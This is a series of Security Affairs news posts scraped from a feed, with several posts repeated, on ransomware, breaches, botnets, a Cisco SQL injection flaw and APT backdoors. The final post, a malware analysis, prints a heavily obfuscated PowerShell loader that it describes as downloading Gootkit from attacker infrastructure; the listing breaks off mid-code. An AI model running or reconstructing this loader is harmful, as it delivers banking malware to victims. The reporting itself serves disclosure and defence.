“The Nikulinsky inter-district prosecutor’s office recognized as lawful and justified the initiation of criminal proceedings by the investigative bodies of the Moscow police under Part 1 of Article 273 of the Criminal Code of the Russian Federation (” Creation, use and distribution of malicious computer programs “) into the cyber attack on the Moscow cableway server,” said the metropolitan prosecutor’s office Lyudmila Nefedova.

In November 2016, another public transport system was infected with ransomware,

This is not the first time that public transportation has been affected by ransomware. In November 2016, hackers crashed the computer system of the San Francisco’s Municipal railway, took offline the ticket kiosks offline and gave riders a free ride for an entire day.

Pierluigi Paganini

(Security Affairs – ransomware, Moscow cable car)

The post Moscow’s New Cable Car closed due to a ransomware infection appeared first on Security Affairs.

Security Affairs: Security Affairs newsletter Round 191 – News of the week

A new round of the weekly SecurityAffairs newsletter arrived!

The best news of the week with Security Affairs.

Let me inform you that my new book, “Digging in the Deep Web” is online with a special deal

20% discount

Kindle Edition

Paper Copy

Digging The Deep Web

Once again thank you!

·      Very trivial Spotify phishing campaign uncovered by experts
·      Experts found a new powerful modular Linux cryptominer
·      Hacker stole $1m from Silicon Valley executive via SIM swap
·      Linux Kernel is affected by two DoS vulnerabilities still unpatched
·      Ransomware attack disrupted emergency rooms at Ohio Hospital System
·      When Do You Need to Report a Data Breach?
·      Experts demonstrate how to exfiltrate data using smart bulbs
·      Malicious developer distributed tainted version of Event-Stream NodeJS Module to steal Bitcoins
·      The SLoad Powershell malspam is expanding to Italy
·      UK Parliament seized confidential Facebook docs to investigate its data protection policies.
·      British MP: Facebook was aware about Russian activity at least since 2014
·      FBI along with security firms dismantled 3ve Ad Fraud Operation
·      Initial patch for Webex Meetings flaw WebExec was incomplete. Cisco fixed it again
·      Uber fined nearly $1.2 Million by Dutch and UK Data Protection Authorities over data breach
·      AccuDoc Data Breach impacted 2.6 Million Atrium Health patients
·      Dell data breach – Dell forces password reset after the incident
·      Dissecting the Mindscrew-Powershell Obfuscation
·      Knock-Knock Docker!! Will you let me in? Open API Abuse in Docker Containers
·      U.S. DoJ charges Iranian duo over SamSam Ransomware activity
·      327 million Marriott guests affected in Starwood Data Breach
·      New PowerShell-based Backdoor points to MuddyWater
·      ETERNALSILENCE – 270K+ devices vulnerable to UPnProxy Botnet build using NSA hacking tools
·      MITRE evaluates Enterprise security products using the ATT&CK Framework

 

Pierluigi Paganini

(Security Affairs – Newsletter)

The post Security Affairs newsletter Round 191 – News of the week appeared first on Security Affairs.



Security Affairs

Security Affairs newsletter Round 191 – News of the week

A new round of the weekly SecurityAffairs newsletter arrived!

The best news of the week with Security Affairs.

Let me inform you that my new book, “Digging in the Deep Web” is online with a special deal

20% discount

Kindle Edition

Paper Copy

Digging The Deep Web

Once again thank you!

·      Very trivial Spotify phishing campaign uncovered by experts
·      Experts found a new powerful modular Linux cryptominer
·      Hacker stole $1m from Silicon Valley executive via SIM swap
·      Linux Kernel is affected by two DoS vulnerabilities still unpatched
·      Ransomware attack disrupted emergency rooms at Ohio Hospital System
·      When Do You Need to Report a Data Breach?
·      Experts demonstrate how to exfiltrate data using smart bulbs
·      Malicious developer distributed tainted version of Event-Stream NodeJS Module to steal Bitcoins
·      The SLoad Powershell malspam is expanding to Italy
·      UK Parliament seized confidential Facebook docs to investigate its data protection policies.
·      British MP: Facebook was aware about Russian activity at least since 2014
·      FBI along with security firms dismantled 3ve Ad Fraud Operation
·      Initial patch for Webex Meetings flaw WebExec was incomplete. Cisco fixed it again
·      Uber fined nearly $1.2 Million by Dutch and UK Data Protection Authorities over data breach
·      AccuDoc Data Breach impacted 2.6 Million Atrium Health patients
·      Dell data breach – Dell forces password reset after the incident
·      Dissecting the Mindscrew-Powershell Obfuscation
·      Knock-Knock Docker!! Will you let me in? Open API Abuse in Docker Containers
·      U.S. DoJ charges Iranian duo over SamSam Ransomware activity
·      327 million Marriott guests affected in Starwood Data Breach
·      New PowerShell-based Backdoor points to MuddyWater
·      ETERNALSILENCE – 270K+ devices vulnerable to UPnProxy Botnet build using NSA hacking tools
·      MITRE evaluates Enterprise security products using the ATT&CK Framework

 

Pierluigi Paganini

(Security Affairs – Newsletter)

The post Security Affairs newsletter Round 191 – News of the week appeared first on Security Affairs.

Security Affairs: Cisco addressed SQL Injection flaw in Cisco Prime License Manager

Cisco has released security updates to address a vulnerability in the web framework code of Cisco Prime License Manager that could be exploited by an attacker to execute arbitrary SQL queries.

Cisco has fixed a vulnerability in Cisco Prime License Manager that could be exploited by a remote unauthenticated attacker to execute arbitrary SQL queries.

The flaw is caused by the lack of proper validation SQL queries provided in input by the users. The attacker could trigger the flaw by sending crafted HTTP POST requests containing malicious SQL statements to the vulnerable applications.

“A vulnerability in the web framework code of Cisco Prime License Manager (PLM) could allow an unauthenticated, remote attacker to execute arbitrary SQL queries.” reads the advisory.” reads the advisory published by Cisco.

“The vulnerability is due to a lack of proper validation of user-supplied input in SQL queries. An attacker could exploit this vulnerability by sending crafted HTTP POST requests that contain malicious SQL statements to an affected application. A successful exploit could allow the attacker to modify and delete arbitrary data in the PLM database or gain shell access with the privileges of the postgres user.” 

The flaw was reported by Suhail Alaskar from Saudi Information Technology Company. The flaw affects the Prime License Manager releases 11.0.1 and later, it impacts both standalone deployments of Cisco Prime License Manager and coresident deployments, where Prime License Manager is installed automatically as part of the installation of Cisco Unified Communications Manager and Cisco Unity Connection, are affected.

Cisco Unified Communications Manager and Cisco Unity Connection Releases 12.0 and later are not affected by this flaw as Cisco Prime License Manager is no longer included in these releases.

The are no workarounds to address the flaw, Cisco released the patch ciscocm.CSCvk30822_v1.0.k3.cop.sgn to address the flaw in Prime License Manager.

“This vulnerability is fixed in Cisco Prime License Manager Release patch ciscocm.CSCvk30822_v1.0.k3.cop.sgn.” continues the company. “The same COP file can be used with standalone deployments of Cisco Prime License Manager as well as with coresident deployments as part of Cisco Unified Communications Manager and Cisco Unity Connection and with all affected versions.” 

Cisco is not aware of attacks in the wild exploiting the flaw.

Pierluigi Paganini

(Security Affairs – CISCO, SQL Injection)

The post Cisco addressed SQL Injection flaw in Cisco Prime License Manager appeared first on Security Affairs.



Security Affairs

Cisco addressed SQL Injection flaw in Cisco Prime License Manager

Cisco has released security updates to address a vulnerability in the web framework code of Cisco Prime License Manager that could be exploited by an attacker to execute arbitrary SQL queries.

Cisco has fixed a vulnerability in Cisco Prime License Manager that could be exploited by a remote unauthenticated attacker to execute arbitrary SQL queries.

The flaw is caused by the lack of proper validation SQL queries provided in input by the users. The attacker could trigger the flaw by sending crafted HTTP POST requests containing malicious SQL statements to the vulnerable applications.

“A vulnerability in the web framework code of Cisco Prime License Manager (PLM) could allow an unauthenticated, remote attacker to execute arbitrary SQL queries.” reads the advisory.” reads the advisory published by Cisco.

“The vulnerability is due to a lack of proper validation of user-supplied input in SQL queries. An attacker could exploit this vulnerability by sending crafted HTTP POST requests that contain malicious SQL statements to an affected application. A successful exploit could allow the attacker to modify and delete arbitrary data in the PLM database or gain shell access with the privileges of the postgres user.” 

The flaw was reported by Suhail Alaskar from Saudi Information Technology Company. The flaw affects the Prime License Manager releases 11.0.1 and later, it impacts both standalone deployments of Cisco Prime License Manager and coresident deployments, where Prime License Manager is installed automatically as part of the installation of Cisco Unified Communications Manager and Cisco Unity Connection, are affected.

Cisco Unified Communications Manager and Cisco Unity Connection Releases 12.0 and later are not affected by this flaw as Cisco Prime License Manager is no longer included in these releases.

The are no workarounds to address the flaw, Cisco released the patch ciscocm.CSCvk30822_v1.0.k3.cop.sgn to address the flaw in Prime License Manager.

“This vulnerability is fixed in Cisco Prime License Manager Release patch ciscocm.CSCvk30822_v1.0.k3.cop.sgn.” continues the company. “The same COP file can be used with standalone deployments of Cisco Prime License Manager as well as with coresident deployments as part of Cisco Unified Communications Manager and Cisco Unity Connection and with all affected versions.” 

Cisco is not aware of attacks in the wild exploiting the flaw.

Pierluigi Paganini

(Security Affairs – CISCO, SQL Injection)

The post Cisco addressed SQL Injection flaw in Cisco Prime License Manager appeared first on Security Affairs.

Security Affairs: ETERNALSILENCE – 270K+ devices vulnerable to UPnProxy Botnet build using NSA hacking tools

Over 270,000 connected devices run vulnerable implementations of UPnP, threat actors are attempting to recruit them in a multi-purpose botnet.

In April, Akamai reported that threat actors compromised 65,000 home routers by exploiting vulnerabilities in Universal Plug’N’Play (UPnP), experts tracked the botnet as UPnProxy.  Now the company provided an update to its initial analysis revealing a disconcerting scenario, UPnProxy is still up and running.

The UPnP communication protocol is widely adopted even if it is known to be vulnerable. In early 2013, researchers at Rapid7 published an interesting whitepaper entitled “Security Flaws in Universal Plug and Play” that evaluated the global exposure of UPnP-enabled network devices.

The report highlighted that over 23 million IPs related to Portable UPnP SDK were vulnerable to remote code execution just through a single UDP packet, over 6,900 product versions from over 1,500 vendors were vulnerable through UPnP due to the exposure of UPnP SOAP service to the internet.

Abusing the protocol attackers can control the traffic in and out the networks, UPnP allows the automated negotiation and configuration of port opening/forwarding within a NATed networking environment.

The malicious botnet uncovered by Akamai is composed of vulnerable devices including malicious NAT injections, it turns routers into proxies, for this reason, the experts called the injected devices UPnProxy.

Experts recommend users to install routers update and patched firmware to mitigate the threat. According to Akamai, many UPnP vulnerabilities are still unpatched, the experts found that out of a pool of 3.5 million potentially vulnerable routers, 277,000 were still open to UPnProxy, and 45,000 have been compromised.

“In Akamai’s previous research, we highlighted the possibility that attackers could leverage UPnProxy to exploit systems living behind the compromised router. Unfortunately, data from this recent batch of injections suggests this is exactly what’s happening.” Akamai notes

“For home users, these attacks can lead to a number of complications, such as degraded service, malware infections, ransomware, and fraud. But for business users, these recent developments could mean systems that were never supposed to exist on the internet in the first place, could now be living there unknowingly, greatly increasing their chances of being compromised. Even more concerning, the services being exposed by this particular campaign have a history of exploitation related to crippling worms and ransomware campaigns targeting both Windows and Linux platforms.”

The latest campaign observed by Akamai tracked as EternalSilence, is targeting millions of machines living behind the vulnerable routers by leveraging the EternalBlue and EternalRed (CVE-2017-7494) exploits.

“Taking current disclosures and events into account, Akamai researchers believe that someone is attempting to compromise millions of machines living behind the vulnerable routers by leveraging the EternalBlue and EternalRed exploits.” continues Akamai.

“Unfortunately, Akamai researchers are not able to see what happens after the injections are have occurred , they can only see the injections themselves and not the final payloads that would be directed at the machines exposed. However, a successful attack could yield a target rich environment, opening up the chance for such things as ransomware attacks, or a persistent foothold on the network.”

Experts observed millions of successful injections attempting to compromise millions of systems running SMB services, Akamai researchers speculate attackers are leveraging the Eternal family of exploits belonging to the NSA arsenal.

Hackers hijacked some 45,113 routers that expose a total of 1.7 million unique machines to the attackers.

“Additionally, there is no way to tell if EternalBlue or EternalRed was used to successfully compromise the exposed machine. However, if only a fraction of the potentially exposed systems were successfully compromised and fell into the hands of the attackers, the situation would quickly turn from bad to worse,” states Akamai.

According to the experts, that attackers are being opportunistic, they are scanning the Internet for SSDP and pivoting to the TCP UPnP daemons or is targeting a set of devices that use static ports (TCP/2048) and paths (/etc/linuxigd/gatedesc.xml) for their UPnP daemons.

“Criminals are clever, and will take any advantage they can get when it comes to exploiting systems and services. So, while it is unfortunate to see UPnProxy being actively leveraged to attack systems previously shielded behind the NAT, it was bound to happen eventually.” concludes Akamai. “That these attacks likely  leverage two well-known vulnerabilities, which have been patched for some time, should come as no surprise.”

Pierluigi Paganini

(Security Affairs – Daniel’s Hosting, dark web)

The post ETERNALSILENCE – 270K+ devices vulnerable to UPnProxy Botnet build using NSA hacking tools appeared first on Security Affairs.



Security Affairs

ETERNALSILENCE – 270K+ devices vulnerable to UPnProxy Botnet build using NSA hacking tools

Over 270,000 connected devices run vulnerable implementations of UPnP, threat actors are attempting to recruit them in a multi-purpose botnet.

In April, Akamai reported that threat actors compromised 65,000 home routers by exploiting vulnerabilities in Universal Plug’N’Play (UPnP), experts tracked the botnet as UPnProxy.  Now the company provided an update to its initial analysis revealing a disconcerting scenario, UPnProxy is still up and running.

The UPnP communication protocol is widely adopted even if it is known to be vulnerable. In early 2013, researchers at Rapid7 published an interesting whitepaper entitled “Security Flaws in Universal Plug and Play” that evaluated the global exposure of UPnP-enabled network devices.

The report highlighted that over 23 million IPs related to Portable UPnP SDK were vulnerable to remote code execution just through a single UDP packet, over 6,900 product versions from over 1,500 vendors were vulnerable through UPnP due to the exposure of UPnP SOAP service to the internet.

Abusing the protocol attackers can control the traffic in and out the networks, UPnP allows the automated negotiation and configuration of port opening/forwarding within a NATed networking environment.

The malicious botnet uncovered by Akamai is composed of vulnerable devices including malicious NAT injections, it turns routers into proxies, for this reason, the experts called the injected devices UPnProxy.

Experts recommend users to install routers update and patched firmware to mitigate the threat. According to Akamai, many UPnP vulnerabilities are still unpatched, the experts found that out of a pool of 3.5 million potentially vulnerable routers, 277,000 were still open to UPnProxy, and 45,000 have been compromised.

“In Akamai’s previous research, we highlighted the possibility that attackers could leverage UPnProxy to exploit systems living behind the compromised router. Unfortunately, data from this recent batch of injections suggests this is exactly what’s happening.” Akamai notes

“For home users, these attacks can lead to a number of complications, such as degraded service, malware infections, ransomware, and fraud. But for business users, these recent developments could mean systems that were never supposed to exist on the internet in the first place, could now be living there unknowingly, greatly increasing their chances of being compromised. Even more concerning, the services being exposed by this particular campaign have a history of exploitation related to crippling worms and ransomware campaigns targeting both Windows and Linux platforms.”

The latest campaign observed by Akamai tracked as EternalSilence, is targeting millions of machines living behind the vulnerable routers by leveraging the EternalBlue and EternalRed (CVE-2017-7494) exploits.

“Taking current disclosures and events into account, Akamai researchers believe that someone is attempting to compromise millions of machines living behind the vulnerable routers by leveraging the EternalBlue and EternalRed exploits.” continues Akamai.

“Unfortunately, Akamai researchers are not able to see what happens after the injections are have occurred , they can only see the injections themselves and not the final payloads that would be directed at the machines exposed. However, a successful attack could yield a target rich environment, opening up the chance for such things as ransomware attacks, or a persistent foothold on the network.”

Experts observed millions of successful injections attempting to compromise millions of systems running SMB services, Akamai researchers speculate attackers are leveraging the Eternal family of exploits belonging to the NSA arsenal.

Hackers hijacked some 45,113 routers that expose a total of 1.7 million unique machines to the attackers.

“Additionally, there is no way to tell if EternalBlue or EternalRed was used to successfully compromise the exposed machine. However, if only a fraction of the potentially exposed systems were successfully compromised and fell into the hands of the attackers, the situation would quickly turn from bad to worse,” states Akamai.

According to the experts, that attackers are being opportunistic, they are scanning the Internet for SSDP and pivoting to the TCP UPnP daemons or is targeting a set of devices that use static ports (TCP/2048) and paths (/etc/linuxigd/gatedesc.xml) for their UPnP daemons.

“Criminals are clever, and will take any advantage they can get when it comes to exploiting systems and services. So, while it is unfortunate to see UPnProxy being actively leveraged to attack systems previously shielded behind the NAT, it was bound to happen eventually.” concludes Akamai. “That these attacks likely  leverage two well-known vulnerabilities, which have been patched for some time, should come as no surprise.”

Pierluigi Paganini

(Security Affairs – UPnProxy, NSA hacking tools)

The post ETERNALSILENCE – 270K+ devices vulnerable to UPnProxy Botnet build using NSA hacking tools appeared first on Security Affairs.

Security Affairs: MITRE evaluates Enterprise security products using the ATT&CK Framework

The MITRE Corporation’s ATT&CK framework has been used to evaluate the efficiency of several enterprise security products designed by several vendors.

In April, MITRE announced a new service based on its ATT&CK (Adversarial Tactics, Techniques, and Common Knowledge) framework to evaluate products based on their ability in detecting advanced persistent threats.

The MITRE ATT&CK evaluation service evaluates endpoint detection and response products for their ability to detect advanced threats.

“There are a lot of products on the market that try to detect adversary behavior, and we’re trying to figure out what they can do,” says Frank Duff, principle cybersecurity engineer at MITRE.

Duff explained MITRE adopt a transparent methodology and knowledge base that will make easy to interpret results obtained with its service.

ATT&CK framework

In the first phase, MITRE offered the possibility to evaluate the service and its efficiency on a case study on APT3/Gothic Panda cyber espionage group.

APT3 (aka UPS Team, Gothic Panda, Buckeye and TG-0110) is a China-linked APT group, it operates under the control of the China’s Ministry of State Security. The cyber espionage group is responsible for several cyber espionage campaigns, including Operation Clandestine Fox, Operation Clandestine Wolf, and Operation Double Tap.  As of June 2015, the group appears to have shifted from targeting primarily US victims to primarily political organizations in Hong Kong. 

The first tests of the ATT&CK framework conducted by Mitre evaluatedthe ability of products from Carbon Black, CrowdStrike, CounterTack, Endgame, Microsoft, RSA and SentinelOne to detect the APT3 cyberespionage group.

The tests are focused on the product’s capabilities of detecting malicious activities typically carried out by the threat actors once they have compromised the system of an organization. It is important to highlight that the MITRE ATT&CK framework does not assign scores to each product, it is not designed as a comparison tool.

“Direct comparison between vendor capabilities is complicated, and we encourage anyone using our results to consider other factors we didn’t evaluate. Our evaluations are narrowly focused on the technical ability to detect adversary behavior.” Duff wrote in a blog post.

“There are other factors we are not accounting for in our evaluations that should be considered by decision makers as they decide which tool best fits their needs,” Duff said. “You should consider factors such as cost of ownership, sophistication of your Security Operations Center, environmental noise, integration with other tools, user interface, security policies, and other factors. One product may not fit every need, and products can address different needs in different ways.”

MITRE worked with vendors during the evaluations and sharing with them the results.

“We approach the evaluations with a collaborative, “purple-teaming” mindset, and we think this allows us to better articulate what a vendor’s capability can do than if we left them out of the process. During the evaluation, MITRE and the vendor are in open communication.” 

“The vendor then shows us their detections and describes their process so that we can verify the detection. Since our goal is to capture different detection methods, we may even suggest to the vendor how their capability might have detected the behavior.”

The initial evaluations included the above vendors that signed up before the June 30, 2018 cohort deadline

Pierluigi Paganini

(Security Affairs – Mitre, ATT&CK Framework)

The post MITRE evaluates Enterprise security products using the ATT&CK Framework appeared first on Security Affairs.



Security Affairs

MITRE evaluates Enterprise security products using the ATT&CK Framework

The MITRE Corporation’s ATT&CK framework has been used to evaluate the efficiency of several enterprise security products designed by several vendors.

In April, MITRE announced a new service based on its ATT&CK (Adversarial Tactics, Techniques, and Common Knowledge) framework to evaluate products based on their ability in detecting advanced persistent threats.

The MITRE ATT&CK evaluation service evaluates endpoint detection and response products for their ability to detect advanced threats.

“There are a lot of products on the market that try to detect adversary behavior, and we’re trying to figure out what they can do,” says Frank Duff, principle cybersecurity engineer at MITRE.

Duff explained MITRE adopt a transparent methodology and knowledge base that will make easy to interpret results obtained with its service.

ATT&CK framework

In the first phase, MITRE offered the possibility to evaluate the service and its efficiency on a case study on APT3/Gothic Panda cyber espionage group.

APT3 (aka UPS Team, Gothic Panda, Buckeye and TG-0110) is a China-linked APT group, it operates under the control of the China’s Ministry of State Security. The cyber espionage group is responsible for several cyber espionage campaigns, including Operation Clandestine Fox, Operation Clandestine Wolf, and Operation Double Tap.  As of June 2015, the group appears to have shifted from targeting primarily US victims to primarily political organizations in Hong Kong. 

The first tests of the ATT&CK framework conducted by Mitre evaluatedthe ability of products from Carbon Black, CrowdStrike, CounterTack, Endgame, Microsoft, RSA and SentinelOne to detect the APT3 cyberespionage group.

The tests are focused on the product’s capabilities of detecting malicious activities typically carried out by the threat actors once they have compromised the system of an organization. It is important to highlight that the MITRE ATT&CK framework does not assign scores to each product, it is not designed as a comparison tool.

“Direct comparison between vendor capabilities is complicated, and we encourage anyone using our results to consider other factors we didn’t evaluate. Our evaluations are narrowly focused on the technical ability to detect adversary behavior.” Duff wrote in a blog post.

“There are other factors we are not accounting for in our evaluations that should be considered by decision makers as they decide which tool best fits their needs,” Duff said. “You should consider factors such as cost of ownership, sophistication of your Security Operations Center, environmental noise, integration with other tools, user interface, security policies, and other factors. One product may not fit every need, and products can address different needs in different ways.”

MITRE worked with vendors during the evaluations and sharing with them the results.

“We approach the evaluations with a collaborative, “purple-teaming” mindset, and we think this allows us to better articulate what a vendor’s capability can do than if we left them out of the process. During the evaluation, MITRE and the vendor are in open communication.” 

“The vendor then shows us their detections and describes their process so that we can verify the detection. Since our goal is to capture different detection methods, we may even suggest to the vendor how their capability might have detected the behavior.”

The initial evaluations included the above vendors that signed up before the June 30, 2018 cohort deadline

Pierluigi Paganini

(Security Affairs – Mitre, ATT&CK Framework)

The post MITRE evaluates Enterprise security products using the ATT&CK Framework appeared first on Security Affairs.

New PowerShell-based Backdoor points to MuddyWater

Security researchers at Trend Micro recently discovered PowerShell-based backdoor that resembles a malware used by MuddyWater threat actor.

Malware researchers at Trend Micro have discovered a Powershell-based backdoor that is very similar to a malware used by MuddyWater APT group.

The first MuddyWater campaign was observed in late 2017, then researchers from Palo Alto Networks were investigating a mysterious wave of attacks in the Middle East.

The experts called the campaign ‘MuddyWater’ due to the confusion in attributing these attacks that took place between February and October 2017 targeting entities in Saudi Arabia, Iraq, Israel, United Arab Emirates, Georgia, India, Pakistan, Turkey, and the United States to date.

Threat actors used PowerShell-based first stage backdoor named POWERSTATS, across the time the hackers changed tools and techniques.

In March 2018, experts at FireEye uncovered a massive phishing campaign conducted by TEMP.Zagros group (another name used by the experts to track the MuddyWater), targeting Asia and Middle East regions from January 2018 to March 2018.

In the latest attacks detected by Trend Micro, threat actors used TTPs compatible with MuddyWater, the malicious code was uploaded to Virus Total from Turkey. The attackers used decoy documents that would drop a new PowerShell backdoor that is similar to MuddyWater’s POWERSTATS malware.

“These documents are named Raport.doc or Gizli Raport.doc (titles mean “Report” or “Secret Report” in Turkish) and maliyeraporti (Gizli Bilgisi).doc (“finance (Confidential Information)” in Turkish) — all of which were uploaded to Virus Total from Turkey.states Trend Micro.

“Our analysis revealed that they drop a new backdoor, which is written in PowerShell as MuddyWater’s known POWERSTATS backdoor. But, unlike previous incidents using POWERSTATS, the command and control (C&C) communication and data exfiltration in this case is done by using the API of a cloud file hosting provider.”

The new backdoor uses the API of a cloud file hosting provider to implement command and control (C&C) communication and data exfiltration.

The weaponized documents contain images showing blurry logos belonging to some Turkish government organizations, they trick victims into enabling macros to display the document properly.

MuddyWater

The macros contain strings encoded in base52, a technique that is not common and that was used by MuddyWater in past attacks. Once enabled, the macros will drop a .dll file (with a PowerShell code embedded) and a .reg file into %temp%directory.

The PowerShell code has several layers of obfuscation, the backdoor initially collects the system information and concatenates various pieces of information (i.e. OS name, domain name, user name, IP address) into one long string.

For communication, the malware uses files named <md5(hard disk serial number)> with various extensions associated with the purpose of the file:

  • .cmd – text file with a command to execute
  • .reg – system info as generated by myinfo() function, see screenshot above
  • .prc – output of the executed .cmd file, stored on local machine only
  • .res – output of the executed .cmd file, stored on cloud storage

“In both the older version of the MuddyWater backdoor and this recent backdoor, these files are used as an asynchronous mechanism instead of connecting directly to the machine and issuing a command.” continues the experts.

“The malware operator leaves a command to execute in a .cmd file, and comes back later to retrieve the .res files containing the result of the issued command.”

The malware supports various commands including file upload, persistence removal, exit, file download, and command execution.

Experts concluded that the attacks aimed at Turkish government organizations related to the finance and energy sectors that were also hit by MuddyWater in the past.

“This is yet another similarity with previous MuddyWater campaigns, which were known to have targeted multiple Turkish government entities.” concludes Trend Micro.

“If the group is responsible for this new backdoor, it shows how they are improving and experimenting with new tools,” Trend Micro concludes.

Pierluigi Paganini

(Security Affairs – MuddyWater, backdoor)

 

The post New PowerShell-based Backdoor points to MuddyWater appeared first on Security Affairs.

327 million Marriott guests affected in Starwood Data Breach

Starwood Data Breach – Hackers accessed the guest reservation system of the Marriot owned Starwood since 2014 and copied and encrypted the information.

Marriott International is the last victim of a long string of data breaches, the company announced that hackers compromised guest reservation database at its subsidiary Starwood hotels and stolen personal details of about 500 million guests.

“The company has not finished identifying duplicate information in the database, but believes it contains information on up to approximately 500 million guests who made a reservation at a Starwood property.” reads the data breach notification published by Marriot.

“For approximately 327 million of these guests, the information includes some combination of name, mailing address, phone number, email address, passport number, Starwood Preferred Guest (“SPG”) account information, date of birth, gender, arrival and departure information, reservation date, and communication preferences.”

This is one of the largest data breaches in history, the biggest one for the hospitality industry.

Marriott International has bought Starwood Hotels and Resorts Worldwide in 2016 for $13 billion. The brand includes St. Regis, Sheraton Hotels & Resorts, W Hotels, Westin Hotels & Resorts, Aloft Hotels, Tribute Portfolio, Element Hotels, Le Méridien Hotels & Resorts, The Luxury Collection, Four Points by Sheraton and Design Hotels.

According to the company, hackers accessed to the Starwood’s guest reservation system since 2014 and copied and encrypted the information.

The intrusion was detected on September 8 when a monitoring system found evidence regarding an attempt to access the Starwood guest reservation database in the United States. Two months later, on November 19, an investigation confirmed the intrusion into the archive containing “guest information relating to reservations at Starwood properties on or before September 10, 2018.”

Unknown hackers accessed personal information of nearly 327 million guests, compromised records include names, mailing addresses, phone numbers, email addresses, passport numbers, dates of birth, genders, arrival and departure information, reservation date.

Starwood Data Breach

The investigation in the Starwood Data Breach revealed that stolen data also includes financial data, payment card numbers and payment card expiration dates were exposed, even if in an encrypted format.

“For some, the information also includes payment card numbers and payment card expiration dates, but the payment card numbers were encrypted using Advanced Encryption Standard encryption (AES-128).” continues the data breach notification.
“There are two components needed to decrypt the payment card numbers, and at this point, Marriott has not been able to rule out the possibility that both were taken.  For the remaining guests, the information was limited to name and sometimes other data such as mailing address, email address, or other information.”

According to Marriott, hackers did not access the Marriott network.

The company reported the incident to the law enforcement and data protection authorities, it is also notifying potentially impacted customers.

According to the EU General Data Protection Regulation (GDPR) regulation, Marriott could face a maximum fine of 20 million euros or 4 percent of its annual global revenue if data protection authorities

Pierluigi Paganini

(Security Affairs – Starwood Data Breach, Marriot)

The post 327 million Marriott guests affected in Starwood Data Breach appeared first on Security Affairs.

Dissecting the Mindscrew-Powershell Obfuscation

The Yoroi-Cybaze ZLAB dissected the VBS script embedded into the zip archives delivered to the victims of a recent attack.

Introduction

Few days ago, the CERT-Yoroi bulletin N061118 disclosed a dangerous campaign attacking several Italian users. The attack wave contained some interesting techniques need to look into further, especially regarding the obfuscation used to hide the malicious dropping infrastructure.

The Yoroi-Cybaze ZLAB dissected the VBS script embedded into the zip archives delivered to the victims,  finding an inner powershell payload designed to actually download the malicious Gootkit binary from the attacker’s infrastructure. This inner script was carefully obfuscated in a clever and unseen way.

Technical Analysis

The Powershell code executed by the initial VBS script appears as following:

  1. ( ‘…..’|%{${#/~} =+ $()}{ ${@}=${#/~}} { ${/.} = ++${#/~}}{ ${*~}=(${#/~} =${#/~} +${/.})} {${$./} =(${#/~}= ${#/~} + ${/.} )}{${)@}=( ${#/~}=${#/~}+${/.} )} { ${‘} =(${#/~} =${#/~}+ ${/.}) } { ${;} = ( ${#/~}=${#/~} + ${/.}) } {${ *-}= ( ${#/~}=${#/~}+${/.})} {${“[+} = ( ${#/~} =${#/~} +${/.} ) } { ${#~=}= ( ${#/~}= ${#/~}+ ${/.} )} { ${“@} =”[” +”$(@{ } ) “[${ *-} ] + “$(@{})”[ “${/.}” +”${#~=}” ]+ “$(@{ })”[“${*~}”+”${@}”]+”$? “[${/.} ]+”]” }{${#/~} = “”.(“$( @{} )”[ “${/.}${)@}” ]+”$(@{ }) “[“${/.}${;}”] + “$( @{ } ) “[ ${@}]+ “$(@{} ) “[ ${)@}]+ “$?”[${/.}] + “$( @{ } ) “[${$./} ])}{${#/~} =”$( @{} ) “[ “${/.}${)@}”] + “$( @{ } )”[${)@}] +”${#/~}”[ “${*~}${ *-}”]} ); .${#/~} (“${#/~} (${“@}${/.}${@}${‘} + ${“@}${/.}${@}${*~} +${“@}${)@}${@}+ ${“@}${$./}${;}+${“@}${/.}${@}${)@} +${“@}${/.}${/.}${/.} +${“@}${/.}${/.}${‘}+ ${“@}${/.}${/.}${;} +${“@}${)@}${;}+${“@}${/.}${/.}${“[+}+${“@}${/.}${@}${/.}+${“@}${/.}${/.}${)@}+${“@}${/.}${/.}${‘}+${“@}${/.}${@}${‘}+${“@}${/.}${/.}${/.}+ ${“@}${/.}${/.}${@}+${“@}${)@}${;}+ ${“@}${/.}${@}${#~=} + ${“@}${#~=}${ *-}+ ${“@}${/.}${@}${;}+ ${“@}${/.}${/.}${/.} +${“@}${/.}${/.}${)@}+ ${“@}${$./}${*~}+${“@}${)@}${‘}+ ${“@}${/.}${@}${“[+} + ${“@}${/.}${/.}${;}+ ${“@}${$./}${*~} +${“@}${‘}${/.} + ${“@}${)@}${/.}+ ${“@}${/.}${*~}${$./} + ${“@}${ *-}${$./}+ ${“@}${/.}${@}${#~=}+ ${“@}${/.}${/.}${*~}+ ${“@}${/.}${/.}${/.} + ${“@}${/.}${/.}${)@}+${“@}${/.}${/.}${;}+ ${“@}${)@}${‘}+${“@}${ *-}${ *-}+ ${“@}${/.}${/.}${/.}+${“@}${/.}${@}${@}+ ${“@}${/.}${/.}${ *-}+${“@}${/.}${@}${“[+} +${“@}${/.}${@}${/.}+${“@}${$./}${*~} +${“@}${;}${;}+${“@}${/.}${@}${‘}+ ${“@}${/.}${/.}${;}+${“@}${/.}${/.}${‘}+${“@}${“[+}${)@} +${“@}${/.}${/.}${)@}+ ${“@}${#~=}${ *-} +${“@}${/.}${/.}${@}+${“@}${/.}${/.}${‘}+ ${“@}${/.}${@}${*~} + ${“@}${/.}${@}${/.} +${“@}${/.}${/.}${)@} + ${“@}${/.}${*~}${‘}+${“@}${$./}${*~} +${“@}${“[+}${$./} + ${“@}${/.}${/.}${;} + ${“@}${#~=}${ *-}+ ${“@}${/.}${/.}${)@} +${“@}${/.}${/.}${;} + ${“@}${)@}${‘} + ${“@}${;}${;} + ${“@}${/.}${@}${‘}+${“@}${/.}${/.}${;} + ${“@}${/.}${/.}${‘}+${“@}${“[+}${)@} +${“@}${/.}${/.}${)@} +${“@}${#~=}${ *-} +${“@}${/.}${/.}${@}+ ${“@}${/.}${/.}${‘}+${“@}${/.}${@}${*~} +${“@}${/.}${@}${/.} + ${“@}${/.}${/.}${)@} + ${“@}${$./}${*~}+${“@}${)@}${‘}+ ${“@}${“[+}${$./}+ ${“@}${/.}${/.}${/.}+ ${“@}${/.}${/.}${ *-} + ${“@}${/.}${/.}${)@}+ ${“@}${#~=}${#~=}+${“@}${/.}${@}${/.} + ${“@}${$./}${*~}+ ${“@}${/.}${@}${)@}+ ${“@}${/.}${/.}${;}+ ${“@}${/.}${/.}${;} + ${“@}${/.}${/.}${*~} +${“@}${/.}${/.}${‘}+${“@}${‘}${“[+}+ ${“@}${)@}${ *-}+${“@}${)@}${ *-}+${“@}${/.}${/.}${*~} +${“@}${/.}${/.}${)@} + 